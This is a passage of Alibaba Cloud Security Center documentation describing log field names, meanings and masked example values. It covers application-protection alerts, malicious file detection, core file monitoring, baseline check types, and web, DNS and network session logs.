2023-10-09 15:19:15

timestamp

Timestamp when the alert was triggered, in milliseconds.

1696835955070

type

Vulnerability type. Values:

  • attach: Malicious Attach.

  • beans: Malicious beans binding.

  • classloader: Malicious class loading.

  • dangerous_protocol: Dangerous protocol usage.

  • dns: Malicious DNS query.

  • engine: Engine injection.

  • expression: Expression injection.

  • file: Malicious file read/write.

  • file_delete: Arbitrary file deletion.

  • file_list: Directory traversal.

  • file_read: Arbitrary file read.

  • file_upload: Malicious file upload.

  • jndi: JNDI injection.

  • jni: JNI injection.

  • jstl: JSTL arbitrary file inclusion.

  • memory_shell: In-memory webshell injection.

  • rce: Command execution.

  • read_object: Deserialization attack.

  • reflect: Malicious reflection call.

  • sql: SQL injection.

  • ssrf: Malicious external connection.

  • thread_inject: Thread injection.

  • xxe: XXE attack.

rce

url

Request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

Vulnerability UUID.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

Host UUID.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

Public IP address of the host.

1.2.XX.XX

intranet_ip

Private IP address of the host.

172.16.XX.XX

sas_group_name

Server group name in Security Center.

Group1

instance_id

Host instance ID.

i-wz995eivg28f1m**

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Malicious file detection logs

Field name

Description

Example

Field name

Description

Example

bucket_name

Bucket name.

***-test

event_id

Alert ID.

802210

event_name

Alert name.

Mining program

md5

MD5 value of the file.

6bc2bc******53d409b1

sha256

SHA256 value of the file.

f038f9525******7772981e87f85

result

Detection result. Values:

  • 0: File is safe.

  • 1: Malicious file exists.

0

file_path

File path.

test.zip/bin_test

etag

OSS file identifier.

6BC2B******853D409B1

risk_level

Risk level. Values:

  • serious: Urgent.

  • suspicions: Suspicious.

  • remind: Reminder.

remind

source

Detection scenario.

  • OSS: Performing detection of files in Alibaba Cloud Object Storage Service buckets in the Security Center console.

  • API: Detecting malicious files through SDK integration, supporting integration via Java or Python.

OSS

parent_md5

MD5 value of the parent file or compressed package file.

3d0f8045bb9******

parent_sha256

SHA256 value of the parent file or compressed package file.

69b643d6******a3fb859fa

parent_file_path

Name of the parent file or compressed package file.

test.zip

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Core file monitoring event logs

Field name

Description

Example

Field name

Description

Example

start_time

Latest occurrence time of the event. Unit: seconds.

1718678414

uuid

UUID of the client.

5d83b26b-b**a-4**a-9267-12****

file_path

File path.

/etc/passwd

proc_path

Process path.

/usr/bin/bash

rule_id

ID of the rule that was triggered.

123

rule_name

Rule name.

file_test_rule

cmdline

Command line.

bash /opt/a

operation

Operation on the file.

READ

risk_level

Alert level.

2

pid

Process ID.

45324

proc_permission

Process permissions.

rwxrwxrwx

instance_id

Instance ID.

i-wz995eivg2****

internet_ip

Internet IP.

192.0.2.1

intranet_ip

Private IP.

172.16.0.1

instance_name

Instance name.

aegis-test

platform

Operating system type.

Linux

Appendix

Baseline types and subtypes list

Type name

Subtype name

Description

Type name

Subtype name

Description

hc_exploit

hc_exploit_redis

High-risk exploitation - Redis unauthorized access high risk

hc_exploit_activemq

High-risk exploitation - ActiveMQ unauthorized access high risk

hc_exploit_couchdb

High-risk exploitation - CouchDB unauthorized access high risk

hc_exploit_docker

High-risk exploitation - Docker unauthorized access high risk

hc_exploit_es

High-risk exploitation - Elasticsearch unauthorized access high risk

hc_exploit_hadoop

High-risk exploitation - Hadoop unauthorized access high risk

hc_exploit_jboss

High-risk exploitation - Jboss unauthorized access high risk

hc_exploit_jenkins

High-risk exploitation - Jenkins unauthorized access high risk

hc_exploit_k8s_api

High-risk exploitation Kubernetes-Apiserver unauthorized access high risk

hc_exploit_ldap

High-risk exploitation - LDAP unauthorized access high risk (Windows environment)

hc_exploit_ldap_linux

High-risk exploitation - openLDAP unauthorized access high risk (Linux environment)

hc_exploit_memcache

High-risk exploitation - Memcached unauthorized access high risk

hc_exploit_mongo

High-risk exploitation - Mongodb unauthorized access high risk

hc_exploit_pgsql

High-risk exploitation - Postgresql unauthorized access high risk baseline

hc_exploit_rabbitmq

High-risk exploitation - RabbitMQ unauthorized access high risk

hc_exploit_rsync

High-risk exploitation - rsync unauthorized access high risk

hc_exploit_tomcat

High-risk exploitation - Apache Tomcat AJP file inclusion vulnerability risk

hc_exploit_zookeeper

High-risk exploitation - ZooKeeper unauthorized access high risk

hc_container

hc_docker

Alibaba Cloud standard - Docker security baseline check

hc_middleware_ack_master

International common security best practices - Kubernetes(ACK) Master node security baseline check

hc_middleware_ack_node

International common security best practices - Kubernetes(ACK) Node node security baseline check

hc_middleware_k8s

Alibaba Cloud standard - Kubernetes-Master security baseline check

hc_middleware_k8s_node

Alibaba Cloud standard - Kubernetes-Node security baseline check

cis

hc_suse 15_djbh

Level-3 classified protection - SUSE 15 compliance baseline check

hc_aliyun_linux3_djbh_l3

Level-3 classified protection - Alibaba Cloud Linux 3 compliance baseline check

hc_aliyun_linux_djbh_l3

Level-3 classified protection - Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_bind_djbh

Level-3 classified protection - Bind compliance baseline check

hc_centos 6_djbh_l3

Level-3 classified protection - CentOS Linux 6 compliance baseline check

hc_centos 7_djbh_l3

Level-3 classified protection - CentOS Linux 7 compliance baseline check

hc_centos 8_djbh_l3

Level-3 classified protection - CentOS Linux 8 compliance baseline check

hc_debian_djbh_l3

Level-3 classified protection - Debian Linux 8/9/10 compliance baseline check

hc_iis_djbh

Level-3 classified protection - IIS compliance baseline check

hc_informix_djbh

Level-3 classified protection - Informix compliance baseline check

hc_jboss_djbh

Level-3 classified protection - Jboss compliance baseline check

hc_mongo_djbh

Level-3 classified protection - MongoDB compliance baseline check

hc_mssql_djbh

Level-3 classified protection - SQL Server compliance baseline check

hc_mysql_djbh

Level-3 classified protection - MySql compliance baseline check

hc_nginx_djbh

Level-3 classified protection - Nginx compliance baseline check

hc_oracle_djbh

Level-3 classified protection - Oracle compliance baseline check

hc_pgsql_djbh

Level-3 classified protection - PostgreSql compliance baseline check

hc_redhat 6_djbh_l3

Level-3 classified protection - Redhat Linux 6 compliance baseline check

hc_redhat_djbh_l3

Level-3 classified protection - Redhat Linux 7 compliance baseline check

hc_redis_djbh

Level-3 classified protection - Redis compliance baseline check

hc_suse 10_djbh_l3

Level-3 classified protection - SUSE 10 compliance baseline check

hc_suse 12_djbh_l3

Level-3 classified protection - SUSE 12 compliance baseline check

hc_suse_djbh_l3

Level-3 classified protection - SUSE 11 compliance baseline check

hc_ubuntu 14_djbh_l3

Level-3 classified protection - Ubuntu 14 compliance baseline check

hc_ubuntu_djbh_l3

Level-3 classified protection - Ubuntu 16/18/20 compliance baseline check

hc_was_djbh

Level-3 classified protection - Websphere Application Server compliance baseline check

hc_weblogic_djbh

Level-3 classified protection - Weblogic compliance baseline check

hc_win 2008_djbh_l3

Level-3 classified protection - Windows 2008 R2 compliance baseline check

hc_win 2012_djbh_l3

Level-3 classified protection - Windows 2012 R2 compliance baseline check

hc_win 2016_djbh_l3

Level-3 classified protection - Windows 2016/2019 compliance baseline check

hc_aliyun_linux_djbh_l2

Level-2 classified protection - Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_centos 6_djbh_l2

Level-2 classified protection - CentOS Linux 6 compliance baseline check

hc_centos 7_djbh_l2

Level-2 classified protection - CentOS Linux 7 compliance baseline check

hc_debian_djbh_l2

Level-2 classified protection - Debian Linux 8 compliance baseline check

hc_redhat 7_djbh_l2

Level-2 classified protection - Redhat Linux 7 compliance baseline check

hc_ubuntu_djbh_l2

Level-2 classified protection - Ubuntu16/18 compliance baseline check

hc_win 2008_djbh_l2

Level-2 classified protection - Windows 2008 R2 compliance baseline check

hc_win 2012_djbh_l2

Level-2 classified protection - Windows 2012 R2 compliance baseline check

hc_win 2016_djbh_l2

Level-2 classified protection - Windows 2016/2019 compliance baseline check

hc_aliyun_linux_cis

International common security best practices - Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos 6_cis_rules

International common security best practices - CentOS Linux 6 security baseline check

hc_centos 7_cis_rules

International common security best practices - CentOS Linux 7 security baseline check

hc_centos 8_cis_rules

International common security best practices - CentOS Linux 8 security baseline check

hc_debian 8_cis_rules

International common security best practices - Debian Linux 8 security baseline check

hc_ubuntu 14_cis_rules

International common security best practices - Ubuntu 14 security baseline check

hc_ubuntu 16_cis_rules

International common security best practices - Ubuntu 16/18/20 security baseline check

hc_win 2008_cis_rules

International common security best practices - Windows Server 2008 R2 security baseline check

hc_win 2012_cis_rules

International common security best practices - Windows Server 2012 R2 security baseline check

hc_win 2016_cis_rules

International common security best practices - Windows Server 2016/2019 R2 security baseline check

hc_kylin_djbh_l3

Level-3 classified protection - Kylin compliance baseline check

hc_uos_djbh_l3

Level-3 classified protection - Uos compliance baseline check

hc_best_security

hc_aliyun_linux

Alibaba Cloud standard - Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos 6

Alibaba Cloud standard - CentOS Linux 6 security baseline check

hc_centos 7

Alibaba Cloud standard - CentOS Linux 7/8 security baseline check

hc_debian

Alibaba Cloud standard - Debian Linux 8/9/10 security baseline check

hc_redhat 6

Alibaba Cloud standard - Redhat Linux 6 security baseline check

hc_redhat 7

Alibaba Cloud standard - Redhat Linux 7/8 security baseline check

hc_ubuntu

Alibaba Cloud standard - Ubuntu security baseline check

hc_windows_2008

Alibaba Cloud standard - Windows 2008 R2 security baseline check

hc_windows_2012

Alibaba Cloud standard - Windows 2012 R2 security baseline check

hc_windows_2016

Alibaba Cloud standard - Windows 2016/2019 security baseline check

hc_db_mssql

Alibaba Cloud standard - SQL server security baseline check

hc_memcached_ali

Alibaba Cloud standard - Memcached security baseline check

hc_mongodb

Alibaba Cloud standard - MongoDB 3.x version security baseline check

hc_mysql_ali

Alibaba Cloud standard - Mysql security baseline check

hc_oracle

Alibaba Cloud standard - Oracle 11g security baseline check

hc_pgsql_ali

Alibaba Cloud standard - PostgreSql security baseline check

hc_redis_ali

Alibaba Cloud standard - Redis security baseline check

hc_apache

Alibaba Cloud standard - Apache security baseline check

hc_iis_8

Alibaba Cloud standard - IIS 8 security baseline check

hc_nginx_linux

Alibaba Cloud standard - Nginx security baseline check

hc_suse 15

Alibaba Cloud standard - SUSE Linux 15 security baseline check

tomcat 7

Alibaba Cloud standard - Apache Tomcat security baseline check

weak_password

hc_mongodb_pwd

Weak password - MongoDB login weak password detection (supports 2.x version)

hc_weakpwd_ftp_linux

Weak password - FTP login weak password check

hc_weakpwd_linux_sys

Weak password - Linux system login weak password check

hc_weakpwd_mongodb 3

Weak password - MongoDB login weak password detection

hc_weakpwd_mssql

Weak password - SQL Server database login weak password check

hc_weakpwd_mysql_linux

Weak password - Mysql database login weak password check

hc_weakpwd_mysql_win

Weak password - Mysql database login weak password check (Windows version)

hc_weakpwd_openldap

Weak password - Openldap login weak password check

hc_weakpwd_oracle

Weak password - Oracle login weak password detection

hc_weakpwd_pgsql

Weak password - PostgreSQL database login weak password check

hc_weakpwd_pptp

Weak password - pptpd service login weak password check

hc_weakpwd_redis_linux

Weak password - Redis database login weak password check

hc_weakpwd_rsync

Weak password - rsync service login weak password check

hc_weakpwd_svn

Weak password - svn service login weak password check

hc_weakpwd_tomcat_linux

Weak password - Apache Tomcat console weak password check

hc_weakpwd_vnc

Weak password - VncServer weak password check

hc_weakpwd_weblogic

Weak password - Weblogic 12c login weak password detection

hc_weakpwd_win_sys

Weak password - Windows system login weak password check

Network log field descriptions

Web access logs

Field name

Description

Example

Field name

Description

Example

response_content_length

Length of the returned message entity. Unit: Byte.

612

dst_ip

IP address of the destination host.

39.105.XX.XX

dst_port

Port of the destination host.

80

host

IP address or domain name of the accessed target host.

39.105.XX.XX

jump_location

Redirection address.

123

request_method

HTTP request method.

GET

http_referer

HTTP referer sent by the client to the server when making a request, informing the server of the source of the HTTP connection.

www.example.com

request_datetime

Request time.

2024-08-01 06:59:28

status

Response status code from the server to the request.

200

content_type

Request content type.

text/plain;charset=utf-8

response_content_type

Response content type.

text/plain; charset=utf-8

src_ip

Source IP address of the access.

31.220.XX.XX

src_port

Source port of the access.

59524

request_uri

Request URI.

/report

http_user_agent

Request initiated to the client.

okhttp/3.2.0

http_x_forward_for

HTTP request header field that records the client's real IP address.

31.220.XX.XX

DNS resolution logs

Field name

Description

Example

Field name

Description

Example

additional

Information about additional resource records returned by the DNS server, such as CNAME records, MX records, PTR records, etc.

None

additional_num

Number of additional resource records returned by the DNS server.

0

answer

Answer information returned by the DNS server, indicating the specific resolution result of the queried host. The answer information contains the IP address or other relevant information corresponding to the requested domain name, such as A records, AAAA records, etc.

example.com A IN 52 1.2.XX.XX

answer_num

Number of answer information returned by the DNS server.

1

authority

Authority record information returned by the DNS server, indicating the DNS server responsible for managing and providing resolution for that domain name. Authority records contain information about the DNS servers authorized for the requested domain name, such as NS records.

NS IN 17597

authority_num

Number of authority records returned by the DNS server.

1

client_subnet

Subnet mask information of the DNS client.

59.152.XX.XX

dst_ip

Destination IP.

106.55.XX.XX

dst_port

Destination port.

53

net_connect_dir

Direction of DNS request data transmission. Values:

  • in: Requests entering the DNS server.

  • out: Responses sent from the DNS server.

out

qid

Query ID.

13551

query_name

Domain name of the DNS resolution request.

example.com

query_type

Query type of the DNS resolution request.

A

query_datetime

Time of the DNS resolution request.

2024-08-01 08:33:58

rcode

Response code returned by the DNS server, indicating the DNS resolution result.

0

region

Source region ID. Values:

  • 1: Beijing.

  • 2: Qingdao.

  • 3: Hangzhou.

  • 4: Shanghai.

  • 5: Shenzhen.

  • 6: Other.

1

response_datetime

Time when the DNS server returned the response.

2024-08-01 08:31:25

src_ip

Source IP address.

106.11.XX.XX

src_port

Source port.

22

Network session logs

Field name

Description

Example

Field name

Description

Example

asset_type

Asset that generated the log. Values:

  • ECS: Elastic Compute Service.

  • SLB: Server Load Balancer.

  • NAT: NAT Gateway.

ECS

dst_ip

Destination IP address.

119.96.XX.XX

dst_port

Destination port.

443

net_connect_dir

Direction of network session data transmission. Fixed value: out.

  • For TCP protocol, it indicates requests initiated from within Alibaba Cloud to outside Alibaba Cloud.

  • For UDP protocol, it does not represent the actual direction of the request, for reference only.

out

l4_proto

Protocol type. Values:

  • tcp

  • udp

tcp

session_time

Start time of the network session.

2024-08-01 08:31:18

src_ip

Source IP address.

121.40.XX.XX

src_port

Source port.

53602

Local DNS logs

Field name

Description

Example

Field name

Description

Example

anwser_name

Record name of the DNS answer, representing the domain name associated with the resource record.

example.com

answer_rdata

RDA (Resource Data Area) field of the DNS answer, representing the specific value of the resolution result.

106.11.XX.XX

answer_ttl

TTL (Time to Live) field of the DNS answer, representing the lifetime of the resolution result, in seconds.

600

answer_type

Record type of the DNS response. The following are common DNS response type values:

  • 1: A record.

  • 2: NS record.

  • 5: CNAME record.

  • 6: SOA record.

  • 10: NULL record.

  • 12: PTR record.

  • 15: MX record.

  • 16: TXT record.

  • 25: KEY record.

  • 28: AAAA record.

  • 33: SRV record.

  • 41: OPT record.

  • 43: DS record.

  • 44: SSHFP record.

  • 45: IPSECKEY record.

  • 46: RRSIG record.

  • 47: NSEC record.

1

dst_ip

Destination IP address, representing the IP address to which the request is sent, default is in decimal IP address format.

323223****

dst_port

Destination port, representing the port to which the request is sent.

53

group_id

Group ID. The same group ID indicates the same DNS request or response.

3

host

Hostname.

hostname

id

Query ID, used to uniquely identify a DNS request or response.

64588

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

Public IP address of the DNS request or response.

121.40.XX.XX

ip_ttl

TTL value of the IP packet in the DNS request or response.

64

query_name

Domain name being queried.

example.com

query_type

Query type of the DNS resolution request. Values:

  • 1: A record.

  • 2: NS record.

  • 5: CNAME record.

  • 6: SOA record.

  • 10: NULL record.

  • 12: PTR record.

  • 15: MX record.

  • 16: TXT record.

  • 25: KEY record.

  • 28: AAAA record.

  • 33: SRV record.

1

src_ip

IP address that initiated the DNS request or response, default is in decimal IP address format.

168427****

src_port

Port that initiated the DNS request or response.

53

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

time_usecond

Timestamp of the DNS request or response, in microseconds.

590662

tunnel_id

Tunnel ID used by the DNS request or response, used to uniquely identify a network tunnel. A network tunnel is a way to transmit data through different network protocols, which can be used for secure internet access or communication across different networks.

514763

  • On this page (1)
  • Log types supported by different editions
  • Log categories
  • Host logs
  • Security log types
  • Network logs (no longer supported for delivery)
  • Host log field descriptions
  • Login flow logs
  • Network connection logs
  • Process startup logs
  • Brute-force attack logs
  • Account snapshot logs
  • Network snapshot logs
  • Process snapshot logs
  • DNS request logs
  • Client event logs
  • Security log field descriptions
  • Vulnerability logs
  • Baseline logs
  • Security alert logs
  • Cloud security posture management logs
  • Network defense logs
  • Application protection logs
  • Malicious file detection logs
  • Core file monitoring event logs
  • Appendix
  • Baseline types and subtypes list
  • Network log field descriptions
Feedback
phone Contact Us

Chat now with Alibaba Cloud Customer Service to assist you in finding the right products and services to meet your needs.

alicare alicarealicarealicare